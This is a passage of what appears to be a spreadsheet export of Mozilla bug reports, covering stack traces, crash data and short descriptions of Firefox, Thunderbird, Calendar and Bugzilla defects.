line 433 + 45 bytes
nsTableRowGroupFrame::Reflow(nsTableRowGroupFrame * const 0x0266d150
nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp; {...} const
nsHTMLReflowState &amp; {...} unsigned int &amp; 0x00000000) line 1088 + 38 bytes
nsContainerFrame::ReflowChild(nsIFrame * 0x0266d150 nsIPresContext *
0x03233750 nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} int
0x00000000 int 0x000000f0 unsigned int 0x00000000 unsigned int &amp; 0x00000000)
line 646 + 31 bytes
nsTableFrame::ReflowMappedChildren(nsTableFrame * const 0x025ef3dc
nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp; {...} InnerTableReflowState
&amp; {...} unsigned int &amp; 0x00000000) line 2934 + 41 bytes
nsTableFrame::ResizeReflowPass2(nsTableFrame * const 0x025ef3dc nsIPresContext
* 0x03233750 nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...}
unsigned int &amp; 0x00000000) line 1945 + 31 bytes
nsTableFrame::Reflow(nsTableFrame * const 0x025ef3dc nsIPresContext *
0x03233750 nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...}
unsigned int &amp; 0x00000000) line 1589 + 34 bytes
nsTreeFrame::Reflow(nsTreeFrame * const 0x025ef3dc nsIPresContext * 0x03233750
nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} unsigned int &amp;
0x00000000) line 416 + 25 bytes
nsContainerFrame::ReflowChild(nsIFrame * 0x025ef3dc nsIPresContext *
0x03233750 nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} int
0x00000000 int 0x00000000 unsigned int 0x00000003 unsigned int &amp; 0x00000000)
line 646 + 31 bytes
nsTableOuterFrame::IR_InnerTableReflow(nsTableOuterFrame * const 0x025ef37c
nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp; {...} OuterTableReflowState
&amp; {...} unsigned int &amp; 0x00000000) line 724 + 40 bytes
nsTableOuterFrame::IR_TargetIsInnerTableFrame(nsTableOuterFrame * const
0x025ef37c nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp; {...}
OuterTableReflowState &amp; {...} unsigned int &amp; 0x00000000) line 498 + 31 bytes
nsTableOuterFrame::IR_TargetIsChild(nsTableOuterFrame * const 0x025ef37c
nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp; {...} OuterTableReflowState
&amp; {...} unsigned int &amp; 0x00000000 nsIFrame * 0x025ef3dc) line 465 + 31 bytes
nsTableOuterFrame::IncrementalReflow(nsTableOuterFrame * const 0x025ef37c
nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp; {...} OuterTableReflowState
&amp; {...} unsigned int &amp; 0x00000000) line 445 + 35 bytes
nsTableOuterFrame::Reflow(nsTableOuterFrame * const 0x025ef37c nsIPresContext *
0x03233750 nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...}
unsigned int &amp; 0x00000000) line 957 + 31 bytes
nsTreeOuterFrame::Reflow(nsTreeOuterFrame * const 0x025ef37c nsIPresContext *
0x03233750 nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...}
unsigned int &amp; 0x00000000) line 136 + 25 bytes
nsBoxFrameInner::FlowChildAt(nsIFrame * 0x025ef37c nsIPresContext * 0x03233750
nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} unsigned int &amp;
0x00000000 nsCalculatedBoxInfo &amp; {...} int 0x00000000 int 0x00000000 int
0x00000001 nsIFrame * &amp; 0x00000000 int &amp; 0x00000000 const nsString &amp; {...})
line 2262
nsBoxFrameInner::FlowChildAt(nsIFrame * 0x025ef37c nsIPresContext * 0x03233750
nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} unsigned int &amp;
0x00000000 nsCalculatedBoxInfo &amp; {...} int 0x00000000 int 0x00000000 int
0x00000001 nsIFrame * &amp; 0x00000000 int &amp; 0x00000000 const nsString &amp; {...})
line 2086 + 62 bytes
nsBoxFrameInner::FlowChildren(nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp;
{...} const nsHTMLReflowState &amp; {...} unsigned int &amp; 0x00000000 nsIFrame * &amp;
0x00000000 nsRect &amp; {...} nsSize &amp; {...} int &amp; 0x000000ef) line 1479
nsBoxFrame::Reflow(nsBoxFrame * const 0x025ef314 nsIPresContext * 0x03233750
nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} unsigned int &amp;
0x00000000) line 1206
nsBoxFrameInner::FlowChildAt(nsIFrame * 0x025ef314 nsIPresContext * 0x03233750
nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} unsigned int &amp;
0x00000000 nsCalculatedBoxInfo &amp; {...} int 0x00000a14 int 0x00000000 int
0x00000001 nsIFrame * &amp; 0x00000000 int &amp; 0x00000000 const nsString &amp; {...})
line 2289
nsBoxFrameInner::FlowChildren(nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp;
{...} const nsHTMLReflowState &amp; {...} unsigned int &amp; 0x00000000 nsIFrame * &amp;
0x00000000 nsRect &amp; {...} nsSize &amp; {...} int &amp; 0x00002fdf) line 1479
nsBoxFrame::Reflow(nsBoxFrame * const 0x025ee280 nsIPresContext * 0x03233750
nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} unsigned int &amp;
0x00000000) line 1206
nsBoxFrameInner::FlowChildAt(nsIFrame * 0x025ee280 nsIPresContext * 0x03233750
nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} unsigned int &amp;
0x00000000 nsCalculatedBoxInfo &amp; {...} int 0x00000000 int 0x00000438 int
0x00000001 nsIFrame * &amp; 0x00000000 int &amp; 0x00000000 const nsString &amp; {...})
line 2289
nsBoxFrameInner::FlowChildAt(nsIFrame * 0x025ee280 nsIPresContext * 0x03233750
nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} unsigned int &amp;
0x00000000 nsCalculatedBoxInfo &amp; {...} int 0x00000000 int 0x00000438 int
0x00000001 nsIFrame * &amp; 0x00000000 int &amp; 0x00000000 const nsString &amp; {...})
line 2068 + 62 bytes
nsBoxFrameInner::FlowChildren(nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp;
{...} const nsHTMLReflowState &amp; {...} unsigned int &amp; 0x00000000 nsIFrame * &amp;
0x00000000 nsRect &amp; {...} nsSize &amp; {...} int &amp; 0x00002fdf) line 1479
nsBoxFrame::Reflow(nsBoxFrame * const 0x025f8098 nsIPresContext * 0x03233750
nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} unsigned int &amp;
0x00000000) line 1206
nsContainerFrame::ReflowChild(nsIFrame * 0x025f8098 nsIPresContext *
0x03233750 nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} int
0x00000000 int 0x00000000 unsigned int 0x00000000 unsigned int &amp; 0x00000000)
line 646 + 31 bytes
RootFrame::Reflow(RootFrame * const 0x025f805c nsIPresContext * 0x03233750
nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} unsigned int &amp;
0x00000000) line 331
nsContainerFrame::ReflowChild(nsIFrame * 0x025f805c nsIPresContext *
0x03233750 nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} int
0x00000000 int 0x00000000 unsigned int 0x00000000 unsigned int &amp; 0x00000000)
line 646 + 31 bytes
ViewportFrame::Reflow(ViewportFrame * const 0x025f8020 nsIPresContext *
0x03233750 nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...}
unsigned int &amp; 0x00000000) line 531
nsHTMLReflowCommand::Dispatch(nsHTMLReflowCommand * const 0x07bc9810
nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp; {...} const nsSize &amp; {...}
nsIRenderingContext &amp; {...}) line 145
PresShell::ProcessReflowCommands(PresShell * const 0x03237400 int 0x00000000)
line 2054
PresShell::FlushPendingNotifications(PresShell * const 0x03237400) line 2518
nsXULDocument::FlushPendingNotifications(nsXULDocument * const 0x0327f7d0) line 1746
nsTreeRowGroupFrame::EnsureRowIsVisible(int 0x0000000f) line 1844
nsTreeFrame::EnsureRowIsVisible(nsTreeFrame * const 0x025ef448 int 0x0000000f)
line 618
nsXULTreeElement::EnsureElementIsVisible(nsXULTreeElement * const 0x0374e4f8
nsIDOMXULElement * 0x066ff464) line 693
XULTreeElementEnsureElementIsVisible(JSContext * 0x02f1dc20 JSObject *
0x026384f8 unsigned int 0x00000001 long * 0x0255abb0 long * 0x0012e5e4) line
870 + 24 bytes
js_Invoke(JSContext * 0x02f1dc20 unsigned int 0x00000001 unsigned int
0x00000000) line 665 + 26 bytes
js_Interpret(JSContext * 0x02f1dc20 long * 0x0012eee4) line 2292 + 15 bytes
js_Invoke(JSContext * 0x02f1dc20 unsigned int 0x00000000 unsigned int
0x00000000) line 681 + 13 bytes
js_Interpret(JSContext * 0x02f1dc20 long * 0x0012f7a0) line 2292 + 15 bytes
js_Invoke(JSContext * 0x02f1dc20 unsigned int 0x00000001 unsigned int
0x00000002) line 681 + 13 bytes
nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJSClass * const 0x037728f0
nsXPCWrappedJS * 0x03772830 unsigned short 0x000a const nsXPTMethodInfo *
0x00ff721c nsXPTCMiniVariant * 0x0012fa64) line 737 + 22 bytes
nsXPCWrappedJS::CallMethod(nsXPCWrappedJS * const 0x03772830 unsigned short
0x000a const nsXPTMethodInfo * 0x00ff721c nsXPTCMiniVariant * 0x0012fa64) line 310
PrepareAndDispatch(nsXPTCStubBase * 0x03772830 unsigned int 0x0000000a
unsigned int * 0x0012fb18 unsigned int * 0x0012fb04) line 100 + 31 bytes
SharedStub() line 125
you can see this method simply assign non ASCII (possible non ASCII) data to
nsString by using the Assign method while mYarn_Buf may have non ASCII data in
different charset.
/* static */void nsMsgDatabase::YarnTonsString(struct mdbYarn *yarn nsString *str)
{
	str-&gt;Assign((const char *) yarn-&gt;mYarn_Buf yarn-&gt;mYarn_Fill)
}
-	yarn	0x00129acc
	mYarn_Buf	0x0661680c
	mYarn_Fill	0x0000003c
	mYarn_Size	0x0000003c
	mYarn_More	0x00000000
	mYarn_Form	0x00000000
	mYarn_Grow	0x00129af8
0661680C  B3 6F B8 CC AA BA A4 F9 A4 6C  ?o??????l
06616816  C0 B3 A6 B3 BE A8 A6 B3 B3 E1  ?????????.
06616820  2C B6 69 A8 D3 AC DD AC DD 2C  ?i??????
0661682A  A5 5D A7 41 BA A1 B7 4E 2C A4  ?]?A???N?
06616834  40 AD D3 A5 CE A4 DF B8 67 C0  @???????g?
0661683E  E7 AA BA BA F4 AF B8 5E 5F 5E  ?????^_^
06616848  00 CD CD CD FD FD FD FD DD DD  .?????????
To turn on the illegal nsString detection assertion uncomment the following two
lines. touch nsStr.cpp and remake form xpcom . It will only take you 1-4 minutes
to do that.
Z:\mozilla\xpcom\ds&gt;cvs diff buf*.h
Index: bufferRoutines.h
===================================================================
RCS file: /m/pub/mozilla/xpcom/ds/bufferRoutines.hv
retrieving revision 1.40
diff -r1.40 bufferRoutines.h
4950c4950
&lt; //#define DEBUG_ILLEGAL_CAST_UP
&lt; //#define DEBUG_ILLEGAL_CAST_DOWN
---
&gt; #define DEBUG_ILLEGAL_CAST_UP
&gt; #define DEBUG_ILLEGAL_CAST_DOWN
I am not sure the priority of this. Please understand this is currently not a
data lostage issue but ineffectient memory usage issue.</t>
  </si>
  <si>
    <t>BUGZILLA-365506</t>
  </si>
  <si>
    <t>admin/products/updated uses strange mark up</t>
  </si>
  <si>
    <t xml:space="preserve">
    Updated description to:
and poor markups</t>
  </si>
  <si>
    <t>FIREFOX-352518</t>
  </si>
  <si>
    <t>[mac] scroll left button of tab bar has different behavior/colors than scroll right button</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1b2) Gecko/20060913 BonEcho/2.0b2
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1b2) Gecko/20060913 BonEcho/2.0b2
The scroll right button of the tab bar only gets bright when its active and you hover over/click it the scroll left button is always bright and only the arrow indicates the current state of the button.
Reproducible: Always
Steps to Reproduce:
1. Open enough tabs that the scroll left and scroll right buttons appear on the tab bar
2. compare the behavior/colors of the scroll left button in its different instances/states to the behavior/colors of the scroll right button 
Actual Results:  
The scroll left button is always bright and only the arrow indicates the current state of the button.
Expected Results:  
The scroll left button should behave like the scroll right button and be only bright when its active and you hover over/click it.</t>
  </si>
  <si>
    <t>lc__fc-xx001xx</t>
  </si>
  <si>
    <t>SEAMONKEY-507735</t>
  </si>
  <si>
    <t>Broken link to source tar archive</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.22) Gecko/20090731 SeaMonkey/1.1.17
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.22) Gecko/20090731 SeaMonkey/1.1.17
The sentence
Source Code Tarball (bzip 56 MB) - note that it doesn't unpack a subdirectory itself so create a directory to unpack it in. point to a broken link.
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.0b1/source/seamonkey-2.0b1.source.tar.bz2
404 Not found.
Reproducible: Always</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-640153</t>
  </si>
  <si>
    <t>[dashboard][webby] Add Weblocale to admin</t>
  </si>
  <si>
    <t>Let's add Weblocale to the admin panel with some nice filtering-by-project and  booleans editable in-place (without having to click through and edit a weblocale or project object).</t>
  </si>
  <si>
    <t>TOOLKIT-394583</t>
  </si>
  <si>
    <t>'Version x.x.x.x is available' message is missing the x.x.x.x when checking for updates</t>
  </si>
  <si>
    <t>It appears that availableUpdateVersion is set after onAddonUpdateEnded. I suspect one of the recent changes caused this. Patch coming up.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-524773</t>
  </si>
  <si>
    <t>SVN commit access to svn.mozilla.org/projects/mozilla.com/tags</t>
  </si>
  <si>
    <t>Can I get svn commit access to svn.mozilla.org/projects/mozilla.com/tags?
Attempting to get changes for bug 500849 out.</t>
  </si>
  <si>
    <t>CALENDAR-490303</t>
  </si>
  <si>
    <t>Provider: WCAP</t>
  </si>
  <si>
    <t>Invites are not sent when using Sun Calendar Server and the meeting arranger is wrong</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.1 fi rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
Build Identifier: Problem is in every build since 0.8 which works fine (Tried it with the final 0.9 and now with the latest 1.0pre) Thunderbird is 2.0.0.21 and with the 1.0pre I'm using 3.0b2
Ok
I'm in no means a developper and prob can't tell you all the right things but this bug is preventing us from moving from Lightning 0.8 to 0.9 so I need to file this bug.
We are using atm 0.8 version of the thunderbird plugin in our company. It works fine with our Sun Calendar Server (6.3 patch rel 121657-30). When upgrading to 0.9 and with the latest 1.0pre we encountere a following problem:
When creating a new event and inviting people to attend to it no invitations are sent. When checking the event from the calendar server it doesn't show it as being done by you but as you would have invited yourself to the meeting.
When opening the event again in lightning and closing it you are promted for saving changes even if no chages are done.
Reproducible: Always
Steps to Reproduce:
1.Start creating a new event
2.Select people to invite
3.Save the event
Actual Results:  
You appear to invite yourself instead of making your own event and inviting others.
Expected Results:  
You create a new event for yourself and invite others.
I did trace the difference in the query sent by thunderbird to the sun calendar server and one major thing is different. When it is working in 0.8 we are sending this value: orgCalid	userid@domain.fi
and when it is not working in 0.9 and 1.0 pre we are sending only this value:
orgEmail	mailto:userid@domain.fi
Otherwise the sent packages look quite the same. There is some timezone info that is different but I assume that it has nothing to do with this.
So to me it looks like lightning is a bit unsure who I am and acts like I'm only some random inviter instead of beeing me.
Making events where no one is invited work just fine in 1.0pre so it only goes wrong when you invite people.
The only file I can find using that orcalId is this:calWcapCalendarItems.js
There are differences with the code between 0.8 and 1.0pre (Quite obvius).
I'm hoping that some one can figure out what's going wrong</t>
  </si>
  <si>
    <t>jani.kannisto</t>
  </si>
  <si>
    <t>BUGZILLA-110712</t>
  </si>
  <si>
    <t>Default should be `contains' for e-mail SELECTs in new query.cgi</t>
  </si>
  <si>
    <t>To reproduce:
1.  Go to .
2.  Look at the e-mail SELECTS in the `E-mail and numbering' section.
What you should see by default:
*   `contains'.
What you see by default:
*   `is'.</t>
  </si>
  <si>
    <t>WEBSITES-504999</t>
  </si>
  <si>
    <t>Switch blog name from Simon Paquet to Thunderbird Localization</t>
  </si>
  <si>
    <t>Planet.m.o incorrectly identifies http://thunderbird-l10n.blogspot.com/ as my personal blog which it is not. This blog solely exists to communicate l10n-relevant matters to the Thunderbird community. I'm just the messenger )
So please follow the example of http://planet.mozillamessaging.com/ and rename the blog to Thunderbird Localization on planet.mozilla.org. Thanks!</t>
  </si>
  <si>
    <t>BUGZILLA-385778</t>
  </si>
  <si>
    <t>Bugzilla.timezone should be LOGIN_EXEMPT</t>
  </si>
  <si>
    <t>Bugzilla.timezone should be listed in LOGIN_EXEMPT of Bugzilla/WebService/Constants.pm.</t>
  </si>
  <si>
    <t>FIREFOX-330332</t>
  </si>
  <si>
    <t>Recognizable history in bookmarks_history.sqlite after being deleted</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Start Firefox without bookmarks and history.
2. Go to Google and do a search for a subject.
3. Visit 50 matches.
4. Open Places and delete each and every entry until there is nothing left.
5. Close Firefox and examine the bookmarks_history.sqlite.
Result: you'll still see lots of recognizable visited sites.</t>
  </si>
  <si>
    <t>CALENDAR-351155</t>
  </si>
  <si>
    <t>Win32 build with --enable-official-branding still uses generic branding partly</t>
  </si>
  <si>
    <t>I did a static Sunbird build (cleaned obj-dir before) with 
  BUILD_OFFICIAL=1
  MOZILLA_OFFICIAL=1
  ac_add_options --enable-official-branding
set. Afterwards I run make installer to build the NSIS installer.
OK:
Window title is Mozilla Sunbird and graphics in About dialog show Sunbird logo.
User agent shows Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20060902 Sunbird/0.3a2+
Not OK:
Window and sunbird.exe uses generic calendar icon.
Installer build afterwards uses generic Calendar name and icon all over.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-469614</t>
  </si>
  <si>
    <t>[BUGZILLA] Truncate buglog on module startup</t>
  </si>
  <si>
    <t>Created attachment 352968
Truncate!
When mozbot starts up it reads all the lines that have accumulated in the buglog since it shut down and immediately begins outputting the changes if the bots been down awhile this can be a considerable amount and delays current changes from being reported. In general aside from channels where a full bugzilla history is desired it makes more sense to just truncate the log and begin again at startup.</t>
  </si>
  <si>
    <t>CORE-919144</t>
  </si>
  <si>
    <t>Improve handling of nsDisplayFixedPosition and other layerizing properties that don't create stacking contexts</t>
  </si>
  <si>
    <t>CSS properties that need to set properties on layers fall into two categories: those that force their element to be a stacking context and those that don't. The former case is relatively easy to handle: nsFrame::BuildDisplayListForChild recognizes the property as creating a stacking context and calls nsFrame::BuildDisplayListForStackingContext which then creates a display item which returns something other than LAYER_NONE from nsDisplayItem::GetLayerState and builds a layer with the right properties set on it in nsDisplayItem::BuildLayer. The element being a stacking context means all its descendant content can be rendered as the children of a single display item.
The latter case is difficult to handle because the element's descendants may be interleaved in z-order with other content that is not affected by the CSS property so multiple layers must be modified for a given CSS property on a given element. For position:fixed we tried to handle this by creating multiple nsDisplayFixedPosition display items and later opportunistically merging them. This turns out to be a real pain for lots of reasons. For example it complicates invalidation and it's complex to make sure that the right display items are created and merged. It also interacts poorly with our invariant that display item (frame key) pairs are unique.
We already have a better way to handle the latter case and we use it for scrolling. FrameLayerBuilder calls nsLayoutUtils::GetActiveScrolledRoot on the frame for every display item to figure out what the nearest scrolling ancestor is and display items are clustered into ThebesLayers so that all the items in a given ThebesLayer have the same active scrolled root. Each ThebesLayer is given a transform based on the scroll position of the active scrolled root for its items. (In bug 876321 and bug 913444 I extend that so that elements with animated top/left/right/bottom and margins are also considered active scrolled roots --- and it works beautifully and simply.)
I think we can keep extending this approach to handle position:fixed touch-action and other properties that don't create stacking contexts. Here's how it looks:
-- GetActiveScrolledRoot is generalized to compute for each display item a key tuple of the values that will determine properties of its ThebesLayer. The members of this tuple will be:
* The nearest geometric ancestor frame that is being scrolled or having its position animated or is position:fixed.
* A boolean indicating whether the display item should trigger default panning behavior when touched.
Other fields can be added as needed.
-- Items with different key tuples are forced into different layers. Thus all items in a ThebesLayer have the same key tuple.
-- FrameLayerBuilder is responsible for assigning layer properties to ThebesLayers (and other layers) based on the key tuple. These properties include a layer transform fixed positioning properties and some new property for touch-action.
The first thing to do here is to rework nsDisplayFixedPosition to basically get rid of the display item and generalize GetActiveScrolledRoot instead.</t>
  </si>
  <si>
    <t>CORE-451787</t>
  </si>
  <si>
    <t>TM: Trace unary not for numbers and strings</t>
  </si>
  <si>
    <t>TraceRecorder::record_JSOP_NOT bails out of the arg is not boolean or object.  I don't see why we couldn't use the code it has right now for INT and DOUBLE as well...
As far as that goes we should be able to do strings too right?</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-531736</t>
  </si>
  <si>
    <t>[eu] Updated Security page on Mozilla Europe site</t>
  </si>
  <si>
    <t>This bug is tracking localization of the updated security page for Mozilla Europe.
The reference file is in the url field of this bug and has been copied to your folder on mozilla europe
YOURLOCALE/firefox/security/index.html
https://stage.mozilla-europe.org/en/firefox/security/
Note that an extra string was also added to your main.lang file on mozilla europe.
The Default background image is the one of a surfer (-&gt;surfing the web) if the image does not resonate in your language we can keep the current background image for your locale. If this is your preference please indicate it in this bug.
Thanks</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-499623</t>
  </si>
  <si>
    <t>kubla.mozilla.com should use *.mozilla.com wildcard SSL certificate</t>
  </si>
  <si>
    <t>kubla.mozilla.com uses an invalid security certificate.
The certificate is only valid for *.stage.mozilla.com</t>
  </si>
  <si>
    <t>TOOLKIT-250292</t>
  </si>
  <si>
    <t>First use of Find Next or Find Previous causes Find toolbar to disappear</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040707 Firefox/0.9.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040707 Firefox/0.9.0+
If I use typeahead find to search a page (by hitting /) the new find toolbar
drops down and functions as expected. However if I try to use Find Next or Find
Previous (either the toolbar buttons or the keyboard shortcuts) the toolbar
disappears. The next match is still highlighted but the toolbar goes away.
Pressing F3 or Ctrl-g a second time causes it to reappear and the toolbar
continues to work until it is dismissed and a new search is begun.
Reproducible: Always
Steps to Reproduce:
1. Use typeahead find to search a page.
2. Click Find Next Find Previous or hit one of their keyboard shortcuts.
Actual Results:  
Toolbar disappears.
Expected Results:  
Toolbar should remain visible.</t>
  </si>
  <si>
    <t>jhenry</t>
  </si>
  <si>
    <t>CORE-193525</t>
  </si>
  <si>
    <t>Remove embedding/components/windowwatcher/src/nsPrintingPrompt.*</t>
  </si>
  <si>
    <t>As far as I can tell this code isn't used for anything.  No instances of this
class are created anywhere in the embedcomps library it's not subclassed by
anyone and it's not available via XPCOM.  It looks like this was obsoleted by
the platform-specific nsPrintingPromptService implementations in
embedding/components/printingui and the old code was never removed.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-342306</t>
  </si>
  <si>
    <t>Greek version of Firefox has english question marks in many greek sentences</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
The greek version of Firefox has english question marks at the end of many of the greek sentences. This shows very unprofessional to new users of Firefox.
One such example is when you try to close a multi-tab Firefox window. You get asked whether you want to close all the open tabs and the question mark in that question is the english one.
The greek question mark looks like this  (just like an enlish semi-colon)
Please fix this and all such occurrences of english marks at the end of greek sentences.
Reproducible: Always
Steps to Reproduce:
1. Try to close a multi-tab Firefox window
Actual Results:  
An english question mark appears in the sentence instead of a greek one.
Expected Results:  
The software should have presented a greek question mark at the end of the question</t>
  </si>
  <si>
    <t>pkst</t>
  </si>
  <si>
    <t>CORE-257868</t>
  </si>
  <si>
    <t>The PresShell::SetAnonymousContentFor() API sucks</t>
  </si>
  <si>
    <t>To use that method you have to heap allocate and refcount an nsISupportsArray.
We should have an API that lets you pass in just a single nsIContent pointer
(plus maybe an inline helper to iterate an array in case there's many) or a
nsCOMArray at the very least.
(see bug 257690 for the discussion where this came up).</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-289784</t>
  </si>
  <si>
    <t>Registration of Mongolian (mn-MN) Firefox localization</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 mn-MN rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 mn-MN rv:1.7.6) Gecko/20050319
Hi I would like to start localizing Firefox for Mongolian language. mn-MN
My name is Natsagdorj Shagdar member of Mongolian Mozilla translation team. 
Reproducible: Always</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-493638</t>
  </si>
  <si>
    <t>update product-details for Firefox 3.5 RC2</t>
  </si>
  <si>
    <t>Following up on l10n-changesets and shipped-locales in bug 493637 we'll need to update product-details.</t>
  </si>
  <si>
    <t>THUNDERBIRD-281980</t>
  </si>
  <si>
    <t>TBTrunk crash marking junk mail [@ nsScanner::ReadUntil]</t>
  </si>
  <si>
    <t>Couldn't find a component for filter/junk mail so marking selecting general.  A
few users have been crashing with recent ThunderbirdTrunk builds marking
messages as junk mail.  Here is the latest from Talkback:
Count   Offset    Real Signature
[ 5   nsScanner::ReadUntil 2c4cfa31 - nsScanner::ReadUntil ]
     Crash date range: 01-FEB-05 to 03-FEB-05
     Min/Max Seconds since last crash: 11 - 65435
     Min/Max Runtime: 51542 - 152763
     Count   Platform List 
     4   Windows XP [Windows NT 5.1 build 2600] 
     1   Windows 2K [Windows NT 5.0 build 2195] 
     Count   Build Id List 
     5   2005013005
     No of Unique Users         2
 Stack trace(Frame) 
	 nsScanner::ReadUntil
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsScanner.cpp
 line 1273] 
	 CTextToken::Consume
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsHTMLTokens.cpp
 line 589] 
	 nsHTMLTokenizer::ConsumeText
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsHTMLTokenizer.cpp
 line 1008] 
	 nsHTMLTokenizer::ConsumeTag
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsHTMLTokenizer.cpp
 line 600] 
	 nsHTMLTokenizer::ConsumeToken
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsHTMLTokenizer.cpp
 line 491] 
	 nsParser::Tokenize
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsParser.cpp
 line 2728]  
     (3476058)	Comments: Looked at  an e-Mail labeled as junk but still in
Inbasket (That happens 50% of time - some go to trash  some don't).  Clicked it
to make it 'not junk'  TB puked.    BTW:  Message filters do nothing
automatically  but when run by hand they sometimes work.
     (3476058)	Comments:   Gettings to match (rule to actual) is a B****H.
     (3429673)	Comments: Marking message as junk
     (3429361)	Comments: Marking messages as junk (again)
     (3429333)	Comments: Marking messages as junk
     (3429309)	Comments: Marking messages as junk
====================================================================================================
     Count   Offset    Real Signature
[ 1   nsScanner::ReadUntil 2da955ef - nsScanner::ReadUntil ]
     Crash date range: 01-FEB-05 to 01-FEB-05
     Min/Max Seconds since last crash: 1630 - 1630
     Min/Max Runtime: 1630 - 1630
     Count   Platform List 
     1   Windows XP [Windows NT 5.1 build 2600] 
     Count   Build Id List 
     1   2005013106
     No of Unique Users         1
 Stack trace(Frame) 
	 nsScanner::ReadUntil
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsScanner.cpp
 line 1273] 
	 CTextToken::Consume
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsHTMLTokens.cpp
 line 589] 
	 nsHTMLTokenizer::ConsumeText
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsHTMLTokenizer.cpp
 line 1008] 
	 nsHTMLTokenizer::ConsumeTag
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsHTMLTokenizer.cpp
 line 600] 
	 nsHTMLTokenizer::ConsumeToken
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsHTMLTokenizer.cpp
 line 491] 
	 nsParser::Tokenize
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsParser.cpp
 line 2728] 
	 nsParser::Tokenize
[e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsParser.cpp
 line 2720]  
And a link to all current nsScanner::ReadUntil bugs:
